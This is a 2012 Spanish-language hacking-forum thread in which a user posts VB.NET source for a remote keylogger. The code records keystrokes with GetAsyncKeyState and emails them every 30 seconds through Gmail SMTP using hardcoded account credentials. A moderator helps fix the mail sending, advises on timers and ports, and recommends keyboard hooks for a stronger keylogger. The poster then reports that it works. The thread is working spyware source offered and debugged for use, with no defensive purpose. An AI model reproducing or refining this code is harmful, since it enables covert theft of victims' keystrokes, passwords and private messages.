elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP) (Moderador: kub0x)
| | | |-+  Keylogger Remoto Mail
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Keylogger Remoto Mail  (Leído 3,613 veces)
WIитX


Desconectado Desconectado

Mensajes: 1.024


WINTX


Ver Perfil WWW
Keylogger Remoto Mail
« en: 18 Octubre 2012, 15:40 pm »

Bueno intente crear un keylogger pero nose porque no me anda bien  :o directamente que no envía la información al Gmail les dejo el código por si pueden hecharme una mano.

Código:
Imports System.Web
Imports System.IO
Imports System.Net.Mail

Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0

result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
End Sub
Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
Dim mail As New MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("universalprjct@gm ail.com", "furryman")
SmtpServer.Port = 587
SmtpServer.Host = "smtp.gmail.com"

SmtpServer.EnableSsl = True
SmtpServer.EnableSsl = True
mail.To.Add("PON AKI TU CUENTA DE GMAIL")
mail.From = New MailAddress("username@gmail.com")
mail.Subject = "Universal Keylogger"
mail.Body = TextBox1.Text
SmtpServer.Send(mail)
End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
End
End Sub
End Class

TeCo
Admin

Mensajes: 33
Fecha de inscripción: 08/12/2010

 


En línea

"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
kub0x
Enlightenment Seeker
Moderador
***
Desconectado Desconectado

Mensajes: 1.486


S3C M4NI4C


Ver Perfil
Re: Keylogger Remoto Mail
« Respuesta #1 en: 18 Octubre 2012, 17:30 pm »

Simplemente no envia el correo porque asignaste el puerto equivocado a la instancia de la clase SmtpClient(). Si estás usando SSL tendrás que utilizar el puerto 465, si utilizas TLS tendras que utilizar el puerto que introduciste el programa (587). Échale un vistazo a esto -> http://support.google.com/mail/bin/answer.py?hl=es&answer=13287.

Ahora, a ese codigo le meteria mano jejej... ¿No podrias instanciar una sola vez la clase SmtpClient y llenarla con las credenciales de tu correo para no tener que hacerlo n veces dentro del timer?. Estás diciendo a la clase que utilize SSL dos veces ...
Además, esto solo capturaria ciertas pulsaciones del teclado y es un método ya no muy empleado. Si lo que deseeas es codear un buen Keylogger lee sobre Hooks. En este foro tienes un post mío con explicaciones y ejemplos de como utilizarlos.

Saludos!


« Última modificación: 18 Octubre 2012, 17:41 pm por kub0x » En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate

kub0x
Enlightenment Seeker
Moderador
***
Desconectado Desconectado

Mensajes: 1.486


S3C M4NI4C


Ver Perfil
Re: Keylogger Remoto Mail
« Respuesta #2 en: 18 Octubre 2012, 18:07 pm »

Me ha dado por probar la parte del código en la que utilizas el envio por Smtp y funciona a las mil maravillas. Aun así si no te funciona prueba de la manera que te dije arriba.

Saludos!
En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate

WIитX


Desconectado Desconectado

Mensajes: 1.024


WINTX


Ver Perfil WWW
Re: Keylogger Remoto Mail
« Respuesta #3 en: 18 Octubre 2012, 22:11 pm »

Simplemente no envia el correo porque asignaste el puerto equivocado a la instancia de la clase SmtpClient(). Si estás usando SSL tendrás que utilizar el puerto 465, si utilizas TLS tendras que utilizar el puerto que introduciste el programa (587). Échale un vistazo a esto -> http://support.google.com/mail/bin/answer.py?hl=es&answer=13287.

Ahora, a ese codigo le meteria mano jejej... ¿No podrias instanciar una sola vez la clase SmtpClient y llenarla con las credenciales de tu correo para no tener que hacerlo n veces dentro del timer?. Estás diciendo a la clase que utilize SSL dos veces ...
Además, esto solo capturaria ciertas pulsaciones del teclado y es un método ya no muy empleado. Si lo que deseeas es codear un buen Keylogger lee sobre Hooks. En este foro tienes un post mío con explicaciones y ejemplos de como utilizarlos.

Saludos!

Lleva 2 Timers

Timer 1 - Interval 2
Timer 2 - Interval 30000
En línea

"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
WIитX


Desconectado Desconectado

Mensajes: 1.024


WINTX


Ver Perfil WWW
Re: Keylogger Remoto Mail
« Respuesta #4 en: 18 Octubre 2012, 22:27 pm »

Gracias ya lo consegui
« Última modificación: 18 Octubre 2012, 22:30 pm por NienSueños » En línea

"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
douglas keylogger 2.0 remoto
Hacking
BorjaFlores 1 4,684 Último mensaje 4 Enero 2013, 12:33 pm
por pola pola
Keylogger Remoto
Programación Visual Basic
WIитX 1 3,849 Último mensaje 15 Septiembre 2012, 21:29 pm
por raul338
Keylogger remoto
Análisis y Diseño de Malware
Moni42 5 5,068 Último mensaje 27 Noviembre 2014, 14:46 pm
por NyxKazuya
(Ayuda) Keylogger remoto-
Análisis y Diseño de Malware
FAAM 1 3,392 Último mensaje 26 Abril 2015, 16:45 pm
por engel lex
Keylogger Remoto?
Hacking
pmpellegrini7 1 3,579 Último mensaje 8 Junio 2015, 01:44 am
por scott_
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines